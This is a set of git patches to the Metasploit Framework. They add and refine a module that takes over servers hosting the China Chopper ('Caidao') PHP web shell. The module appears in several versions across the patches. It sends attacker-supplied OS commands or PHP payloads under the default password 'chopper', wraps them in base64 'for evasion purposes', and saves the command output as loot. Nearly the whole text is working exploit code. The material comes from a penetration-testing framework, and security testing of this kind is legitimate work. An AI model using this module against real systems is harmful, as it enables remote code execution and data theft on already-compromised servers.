From bc0299356728fd345398616f664dbca364412d84 Mon Sep 17 00:00:00 2001 From: nixawk Date: Wed, 28 Oct 2015 16:43:58 +0000 Subject: [PATCH 1/8] chinese caidao php backdoor command execution --- .../unix/webapp/caidao_php_backdoor_exec.rb | 95 +++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb diff --git a/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb b/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb new file mode 100644 index 0000000000..e45a7f4dd7 --- /dev/null +++ b/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb @@ -0,0 +1,95 @@ + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Chinese Caidao PHP Backdoor Command Execution', + 'Description' => %q{ + This module exploits chinese caidao php backdoor which allows + os command execution. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Nixawk'], + 'References' => [['URL', 'http://www.maicaidao.com']], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['chinsese caidao os cmd exec', {}] + ], + 'DisclosureDate' => 'Oct 27 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new( + 'TARGETURI', [true, 'The path of backdoor', '/caidao.php'] + ), + OptString.new( + 'PASSWORD', [true, 'The password of backdoor', 'chopper'] + ), + OptString.new('CMD', [true, 'The command of os', 'dir']) + ], self.class) + end + + def caidao_req(payload) + l = Rex::Text.rand_text_alpha(16) + r = Rex::Text.rand_text_alpha(16) + uri = normalize_uri(target_uri.path) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'vars_post' => { + "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";" + } + }) + + if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m + $1 + end + end + + def check + flag = Rex::Text.rand_text_alpha(32) + payload = "echo \"#{flag}\"" + data = caidao_req(payload) + + if data && data == flag + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + payload = "echo base64_encode(`#{datastore['CMD']}`)" + data = caidao_req(payload) + + if data && !data.blank? + data = Rex::Text.decode_base64(data) + print_good(data) + path = store_loot("#{datastore['CMD']}", + 'text/plain', + datastore['RHOST'], + data, + "#{datastore['CMD']}") + print_good('Save file to ' + path) + end + end +end From 5d8ccd297edd6cbbea5fc556919c28e647531571 Mon Sep 17 00:00:00 2001 From: nixawk Date: Thu, 29 Oct 2015 02:15:20 +0000 Subject: [PATCH 2/8] Fix References / Exploit -> Auxiliary --- .../gather/caidao_php_backdoor_exec.rb | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 modules/auxiliary/gather/caidao_php_backdoor_exec.rb diff --git a/modules/auxiliary/gather/caidao_php_backdoor_exec.rb b/modules/auxiliary/gather/caidao_php_backdoor_exec.rb new file mode 100644 index 0000000000..4a17a6693b --- /dev/null +++ b/modules/auxiliary/gather/caidao_php_backdoor_exec.rb @@ -0,0 +1,85 @@ + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Chinese Caidao PHP Backdoor Command Execution', + 'Description' => %q{ + This module exploits chinese caidao php backdoor which allows + os command execution. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Nixawk'], + 'References' => + [ + ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'] + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Privileged' => false, + 'DisclosureDate' => 'Oct 27 2015')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']), + OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper']), + OptString.new('CMD', [true, 'The command of os', 'dir']) + ], self.class) + end + + def caidao_req(payload) + l = Rex::Text.rand_text_alpha(16) + r = Rex::Text.rand_text_alpha(16) + uri = normalize_uri(target_uri.path) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'vars_post' => { + "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";" + } + }) + + if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m + $1 + end + end + + def check + flag = Rex::Text.rand_text_alpha(32) + payload = "echo \"#{flag}\"" + data = caidao_req(payload) + + if data && data == flag + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def run + payload = "echo base64_encode(`#{datastore['CMD']}`)" + data = caidao_req(payload) + + if data && !data.blank? + data = Rex::Text.decode_base64(data) + print_good(data) + path = store_loot("#{datastore['CMD']}", + 'text/plain', + datastore['RHOST'], + data, + "#{datastore['CMD']}") + print_good('Save file to ' + path) + end + end +end From faf9be811acda6a1fa7ad38552d45784309e7c1d Mon Sep 17 00:00:00 2001 From: nixawk Date: Thu, 29 Oct 2015 02:18:30 +0000 Subject: [PATCH 3/8] delete caidao_php_backdoor_exec from exploits --- .../unix/webapp/caidao_php_backdoor_exec.rb | 95 ------------------- 1 file changed, 95 deletions(-) delete mode 100644 modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb diff --git a/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb b/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb deleted file mode 100644 index e45a7f4dd7..0000000000 --- a/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb +++ /dev/null @@ -1,95 +0,0 @@ - -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Chinese Caidao PHP Backdoor Command Execution', - 'Description' => %q{ - This module exploits chinese caidao php backdoor which allows - os command execution. - }, - 'License' => MSF_LICENSE, - 'Author' => ['Nixawk'], - 'References' => [['URL', 'http://www.maicaidao.com']], - 'Privileged' => false, - 'Payload' => - { - 'Space' => 2048, - 'DisableNops' => true - }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => - [ - ['chinsese caidao os cmd exec', {}] - ], - 'DisclosureDate' => 'Oct 27 2015', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new( - 'TARGETURI', [true, 'The path of backdoor', '/caidao.php'] - ), - OptString.new( - 'PASSWORD', [true, 'The password of backdoor', 'chopper'] - ), - OptString.new('CMD', [true, 'The command of os', 'dir']) - ], self.class) - end - - def caidao_req(payload) - l = Rex::Text.rand_text_alpha(16) - r = Rex::Text.rand_text_alpha(16) - uri = normalize_uri(target_uri.path) - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => uri, - 'vars_post' => { - "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";" - } - }) - - if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m - $1 - end - end - - def check - flag = Rex::Text.rand_text_alpha(32) - payload = "echo \"#{flag}\"" - data = caidao_req(payload) - - if data && data == flag - Exploit::CheckCode::Vulnerable - else - Exploit::CheckCode::Safe - end - end - - def exploit - payload = "echo base64_encode(`#{datastore['CMD']}`)" - data = caidao_req(payload) - - if data && !data.blank? - data = Rex::Text.decode_base64(data) - print_good(data) - path = store_loot("#{datastore['CMD']}", - 'text/plain', - datastore['RHOST'], - data, - "#{datastore['CMD']}") - print_good('Save file to ' + path) - end - end -end From 6c16d2a1cad63cacdb43cc375a4a306545a752b1 Mon Sep 17 00:00:00 2001 From: nixawk Date: Mon, 2 Nov 2015 08:54:18 +0000 Subject: [PATCH 4/8] caidao's exploit module --- .../gather/caidao_php_backdoor_exec.rb | 85 ------------------- .../multi/http/caidao_php_backdoor_exec.rb | 75 ++++++++++++++++ 2 files changed, 75 insertions(+), 85 deletions(-) delete mode 100644 modules/auxiliary/gather/caidao_php_backdoor_exec.rb create mode 100644 modules/exploits/multi/http/caidao_php_backdoor_exec.rb diff --git a/modules/auxiliary/gather/caidao_php_backdoor_exec.rb b/modules/auxiliary/gather/caidao_php_backdoor_exec.rb deleted file mode 100644 index 4a17a6693b..0000000000 --- a/modules/auxiliary/gather/caidao_php_backdoor_exec.rb +++ /dev/null @@ -1,85 +0,0 @@ - -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit4 < Msf::Auxiliary - - include Msf::Auxiliary::Report - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Chinese Caidao PHP Backdoor Command Execution', - 'Description' => %q{ - This module exploits chinese caidao php backdoor which allows - os command execution. - }, - 'License' => MSF_LICENSE, - 'Author' => ['Nixawk'], - 'References' => - [ - ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'], - ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'] - ], - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Privileged' => false, - 'DisclosureDate' => 'Oct 27 2015')) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']), - OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper']), - OptString.new('CMD', [true, 'The command of os', 'dir']) - ], self.class) - end - - def caidao_req(payload) - l = Rex::Text.rand_text_alpha(16) - r = Rex::Text.rand_text_alpha(16) - uri = normalize_uri(target_uri.path) - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => uri, - 'vars_post' => { - "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";" - } - }) - - if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m - $1 - end - end - - def check - flag = Rex::Text.rand_text_alpha(32) - payload = "echo \"#{flag}\"" - data = caidao_req(payload) - - if data && data == flag - Exploit::CheckCode::Vulnerable - else - Exploit::CheckCode::Safe - end - end - - def run - payload = "echo base64_encode(`#{datastore['CMD']}`)" - data = caidao_req(payload) - - if data && !data.blank? - data = Rex::Text.decode_base64(data) - print_good(data) - path = store_loot("#{datastore['CMD']}", - 'text/plain', - datastore['RHOST'], - data, - "#{datastore['CMD']}") - print_good('Save file to ' + path) - end - end -end diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb new file mode 100644 index 0000000000..79f0280d9f --- /dev/null +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -0,0 +1,75 @@ + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Chinese Caidao PHP Backdoor Code Execution', + 'Description' => %q{ + This module exploits chinese caidao php backdoor. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Nixawk'], + 'References' => + [ + ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'] + ], + 'Payload' => + { + 'BadChars' => '\x00', + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Automatic', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 27 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']), + OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper']) + ], self.class) + end + + def http_send_command(code) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => { + "#{datastore['PASSWORD']}" => code + } + }) + unless res && res.code == 200 + fail_with(Failure::Unknown, 'Failed to execute the code.') + end + res + end + + def check + flag = Rex::Text.rand_text_alpha(16) + res = http_send_command("printf(\"#{flag}\");") + if res && res.body =~ /#{flag}/m + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + http_send_command(payload.raw) + end +end From 46fe0c0899c32cd83ba19b6dff7c8bc110a12e92 Mon Sep 17 00:00:00 2001 From: nixawk Date: Tue, 3 Nov 2015 06:42:52 +0000 Subject: [PATCH 5/8] base64 for evasion purposes --- modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 79f0280d9f..b92814d15e 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -5,6 +5,7 @@ ## require 'msf/core' +require 'pry' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -26,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote ], 'Payload' => { - 'BadChars' => '\x00', + 'BadChars' => '\x00' }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, @@ -46,6 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote end def http_send_command(code) + code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), From 109e9b6b6e415df6e26cf15241636d3e8c5bc866 Mon Sep 17 00:00:00 2001 From: nixawk Date: Tue, 3 Nov 2015 06:52:11 +0000 Subject: [PATCH 6/8] remove debug info - require 'pry' --- modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index b92814d15e..21a3423fc2 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -5,7 +5,6 @@ ## require 'msf/core' -require 'pry' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking From 27be832c4c0fef5683e9dd671907f88cfc105684 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 5 Nov 2015 18:19:46 -0600 Subject: [PATCH 7/8] remove the fail_with because it's always triggering anyway --- .../exploits/multi/http/caidao_php_backdoor_exec.rb | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 21a3423fc2..c2050da87c 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -24,10 +24,6 @@ class Metasploit4 < Msf::Exploit::Remote ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'] ], - 'Payload' => - { - 'BadChars' => '\x00' - }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => @@ -47,17 +43,13 @@ class Metasploit4 < Msf::Exploit::Remote def http_send_command(code) code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));" - res = send_request_cgi({ + send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { "#{datastore['PASSWORD']}" => code } }) - unless res && res.code == 200 - fail_with(Failure::Unknown, 'Failed to execute the code.') - end - res end def check @@ -71,6 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit + print_status("#{peer} - Sending exploit...") http_send_command(payload.raw) end end From ea22583ed1066d45a404525e54bb48539d4e716d Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 5 Nov 2015 18:29:03 -0600 Subject: [PATCH 8/8] Update title and description --- modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index c2050da87c..354346d31f 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -13,9 +13,10 @@ class Metasploit4 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Chinese Caidao PHP Backdoor Code Execution', + 'Name' => 'China Chopper Caidao PHP Backdoor Code Execution', 'Description' => %q{ - This module exploits chinese caidao php backdoor. + This module takes advantage of the China Chopper Webshell that is + commonly used by Chinese hackers. }, 'License' => MSF_LICENSE, 'Author' => ['Nixawk'],